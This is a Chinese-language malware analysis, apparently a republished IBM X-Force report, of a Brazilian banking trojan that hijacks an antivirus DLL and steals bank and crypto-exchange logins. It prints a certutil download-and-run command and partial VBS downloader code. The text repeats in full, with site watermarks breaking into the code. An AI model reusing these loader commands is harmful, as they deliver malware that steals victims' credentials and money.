越简单越好?深入研究巴西金融网络犯罪中使用的恶意软件
远程overlay恶意软件非常多产和通用,它时不时就会出现,但在巴西通常很少发现特殊或复杂的金融恶意软件。而巴西金融网络犯罪分子使用的流行远程覆盖特洛伊木马这个特殊的变体有什么特别之处呢?首先,它使用了并不常见的动态链接库(DLL)劫持技术。更有意思的是,恶意软件的运营商不再只关注银行,他们现在也有兴趣窃取用户的加密货币交换账户,这与金融网络犯罪对加密货币的兴趣日益增长有关。
一、通过远程会话感染巴西用户
IBM X-Force研究持续跟踪巴西的威胁形势。在最近的分析中,我们的团队观察到远程overlay系列恶意软件的新变种感染了该地区的用户。
远程overlay特洛伊木马在针对巴西用户的欺诈中很常见。我们分析的最新变体使用DLL劫持技术远程控制受感染的设备,将其恶意代码加载到免费防病毒程序的合法二进制文件中。
恶意DLL是用Delphi编程语言编写的曲型巴西恶意软件,包含overlay图像(恶意软件在受感染的用户验证在线银行会话后在屏幕上overlay)。屏幕的外观和感觉与受害者银行的相匹配,需要提供个人信息和双因素身份验证(2FA)。
二、对加密货币兴趣与日俱增
加密货币交易账户正在变得比传统账户更受欢迎,这是巴西当地欺诈者可能熟悉并准备利用的趋势。
最近,巴西主要银行攻击活动中的变体针对加密货币交换平台。攻击方法类似于银行目标:通过窃取用户的帐户凭据,接管他们的帐户并将他们的钱转移到犯罪分子的帐户。
三、典型感染流程
查看此远程overly特洛伊木马的感染例程表明,当潜在受害者被诱骗下载其认为是正式发票的文件时,就会被初次感染。该文件是一个存档,其中包含最终会感染设备的恶意脚本。下面是典型感染策略的简要流程:
1. 受害者使用搜索引擎查找提供商的网站并支付月度发票。第一个结果是攻击者通过付费努力提升的恶意页面,而不是真正的网站。受害者访问该页面并键入其ID详细信息以获取发票。
2. 受害者不知不觉的下载了一个恶意LNK文件(Windows快捷方式文件),此文件存档在一个ZIP中,声称来自巴西交通运输部DETRAN。
3. LNK文件包含一个命令,该命令将从远程服务器下载恶意Visual Basic(VBS)脚本,并使用合法的Windows程序certutil运行。
4. 恶意VBS脚本从攻击者的远程服务器下载另一个ZIP文件,这次包含恶意软件的恶意DLL以及用于隐藏DLL的免费防病毒程序的合法二进制文件。
5. VBS脚本执行恶意软件,感染设备。
6. 部署后,特洛伊木马使用DLL劫持技术将其恶意DLL加载到防病毒程序的合法二进制文件中。这种迂回感染例程有助于恶意软件通过安全控制来逃避检测。
7. 完成安装后,恶意软件监视受害者的浏览器,并在受害者浏览目标在线银行网站或加密货币交换平台时开始行动。
8. 恶意DLL组件为恶意软件提供了远程控制功能。
四、深入探究恶意LNK文件
仔细查看LNK文件可以看出它滥用了certutil,certutil是作为证书服务的一部分安装的。
首先,从名为“tudodebom”的远程服务器下载恶意脚本:
“C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f “https://remoteserver/turbulencianoar/tudodebom.txt” %temp%\tudodebom.txt && cd %temp% && rename “tudodebom.txt“
· -urlcache 显示或删除URL缓存条目。
· -split -f 强制获取特定URL并更新缓存。
获取后,恶意软件会将文件名和扩展名从“tudodebom.txt”更改为“JNSzlEYAIubkggX.vbs”:
“JNSzlEYAIubkggX.vbs” && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs“
LNK文件调用Windows命令行(CMD)并执行certutil.exe以从远程主机下载TXT文件(.vbs):
hXXps://remoteserver/turbulencianoar/tudodebom.txt
最后,恶意软件执行恶意VBS脚本。
五、检测VBS 脚本
VBS脚本下载包含恶意软件载荷的ZIP存档。然后,部署在受害者设备上具有以下命名模式的目录中:
“C:\AV product_” + RandomName + “\”
该过程完成后,该脚本将执行合法但有毒的二进制文件,该二进制文件将加载恶意DLL并启动与攻击者的命令和控制(C&C)服务器的连接。
这个例程中有趣的元素包括:
· 使用合法的远程服务器来托管攻击工具;
· 滥用现有防病毒程序中的合法二进制文件来隐藏恶意软件的DLL;
· 恶意软件的命名约定,可以使恶意软件更容易在受感染的设备上检测和隔离。
在分析恶意软件后,我们发现了特洛伊木马用于部署其恶意DLL的VBS脚本,其中包含以下内容:
Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll
Set objShell = CreateObject( “WScript.Shell” )
ubase = “https://remoteserver/turbulencianoar/AuZwaaU.zip”
randname = getrandomstring()
exerandom = “AV product.SystrayStartTrigger-” + randname
filezip = “AuZwaaU.zip”
deffolder = “C:\AV product_” + randname + “\”
filesuccess = objShell.ExpandEnvironmentStrings(“%TEMP%”) + “\java_install.log”
fileexe = “AuZwaaU.exe”
filedll = “AuZwaaU.sys”
Set objFSO = CreateObject(“Scripting.FileSystemObject”)
If (objFSO.FileExists(filesuccess)) Then
WScript.Quit
End If
If not (objFSO.FileExists(filezip)) Then
Set objFile = objFSO.CreateTextFile(filesuccess, True)
objFile.Write ” ”
objFile.Close
‘WScript.Echo msg
dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)
dim bStrm: Set bStrm = createobject(“Adodb.Stream”)
xHttp.Open “GET”, ubase, False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
远程overlay恶意软件非常多产和通用,它时不时就会出现,但在巴西通常很少发现特殊或复杂的金融恶意软件。而巴西金融网络犯罪分子使用的流行远程覆盖特洛伊木马这个特殊的变体有什么特别之处呢?首先,它使用了并不常见的动态链接库(DLL)劫持技术。更有意思的是,恶意软件的运营商不再只关注银行,他们现在也有兴趣窃取用户的加密货币交换账户,这与金融网络犯罪对加密货币的兴趣日益增长有关。
一、通过远程会话感染巴西用户
IBM X-Force研究持续跟踪巴西的威胁形势。在最近的分析中,我们的团队观察到远程overlay系列恶意软件的新变种感染了该地区的用户。
远程overlay特洛伊木马在针对巴西用户的欺诈中很常见。我们分析的最新变体使用DLL劫持技术远程控制受感染的设备,将其恶意代码加载到免费防病毒程序的合法二进制文件中。
恶意DLL是用Delphi编程语言编写的曲型巴西恶意软件,包含overlay图像(恶意软件在受感染的用户验证在线银行会话后在屏幕上overlay)。屏幕的外观和感觉与受害者银行的相匹配,需要提供个人信息和双因素身份验证(2FA)。
二、对加密货币兴趣与日俱增
加密货币交易账户正在变得比传统账户更受欢迎,这是巴西当地欺诈者可能熟悉并准备利用的趋势。 www.wnhack.com
最近,巴西主要银行攻击活动中的变体针对加密货币交换平台。攻击方法类似于银行目标:通过窃取用户的帐户凭据,接管他们的帐户并将他们的钱转移到犯罪分子的帐户。
三、典型感染流程
查看此远程overly特洛伊木马的感染例程表明,当潜在受害者被诱骗下载其认为是正式发票的文件时,就会被初次感染。该文件是一个存档,其中包含最终会感染设备的恶意脚本。下面是典型感染策略的简要流程:
1. 受害者使用搜索引擎查找提供商的网站并支付月度发票。第一个结果是攻击者通过付费努力提升的恶意页面,而不是真正的网站。受害者访问该页面并键入其ID详细信息以获取发票。
2. 受害者不知不觉的下载了一个恶意LNK文件(Windows快捷方式文件),此文件存档在一个ZIP中,声称来自巴西交通运输部DETRAN。
3. LNK文件包含一个命令,该命令将从远程服务器下载恶意Visual Basic(VBS)脚本,并使用合法的Windows程序certutil运行。
4. 恶意VBS脚本从攻击者的远程服务器下载另一个ZIP文件,这次包含恶意软件的恶意DLL以及用于隐藏DLL的免费防病毒程序的合法二进制文件。
5. VBS脚本执行恶意软件,感染设备。
6. 部署后,特洛伊木马使用DLL劫持技术将其恶意DLL加载到防病毒程序的合法二进制文件中。这种迂回感染例程有助于恶意软件通过安全控制来逃避检测。
7. 完成安装后,恶意软件监视受害者的浏览器,并在受害者浏览目标在线银行网站或加密货币交换平台时开始行动。
8. 恶意DLL组件为恶意软件提供了远程控制功能。
四、深入探究恶意LNK文件
仔细查看LNK文件可以看出它滥用了certutil,certutil是作为证书服务的一部分安装的。
首先,从名为“tudodebom”的远程服务器下载恶意脚本:
“C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f “https://remoteserver/turbulencianoar/tudodebom.txt” %temp%\tudodebom.txt && cd %temp% && rename “tudodebom.txt“
· -urlcache 显示或删除URL缓存条目。
· -split -f 强制获取特定URL并更新缓存。
获取后,恶意软件会将文件名和扩展名从“tudodebom.txt”更改为“JNSzlEYAIubkggX.vbs”:
“JNSzlEYAIubkggX.vbs” && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs“
LNK文件调用Windows命令行(CMD)并执行certutil.exe以从远程主机下载TXT文件(.vbs):
hXXps://remoteserver/turbulencianoar/tudodebom.txt
最后,恶意软件执行恶意VBS脚本。 内容来自无奈安全网
五、检测VBS 脚本
VBS脚本下载包含恶意软件载荷的ZIP存档。然后,部署在受害者设备上具有以下命名模式的目录中:
“C:\AV product_” + RandomName + “\”
该过程完成后,该脚本将执行合法但有毒的二进制文件,该二进制文件将加载恶意DLL并启动与攻击者的命令和控制(C&C)服务器的连接。
这个例程中有趣的元素包括:
· 使用合法的远程服务器来托管攻击工具;
· 滥用现有防病毒程序中的合法二进制文件来隐藏恶意软件的DLL;
· 恶意软件的命名约定,可以使恶意软件更容易在受感染的设备上检测和隔离。
在分析恶意软件后,我们发现了特洛伊木马用于部署其恶意DLL的VBS脚本,其中包含以下内容:
Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll
Set objShell = CreateObject( “WScript.Shell” )
ubase = “https://remoteserver/turbulencianoar/AuZwaaU.zip”
randname = getrandomstring()
exerandom = “AV product.SystrayStartTrigger-” + randname
filezip = “AuZwaaU.zip”
deffolder = “C:\AV product_” + randname + “\”
无奈人生安全网
filesuccess = objShell.ExpandEnvironmentStrings(“%TEMP%”) + “\java_install.log”
fileexe = “AuZwaaU.exe”
filedll = “AuZwaaU.sys”
Set objFSO = CreateObject(“Scripting.FileSystemObject”)
If (objFSO.FileExists(filesuccess)) Then
WScript.Quit
End If
If not (objFSO.FileExists(filezip)) Then
Set objFile = objFSO.CreateTextFile(filesuccess, True)
objFile.Write ” ”
objFile.Close
‘WScript.Echo msg
dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)
dim bStrm: Set bStrm = createobject(“Adodb.Stream”)
xHttp.Open “GET”, ubase, False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
本文来自无奈人生安全网
无奈人生安全网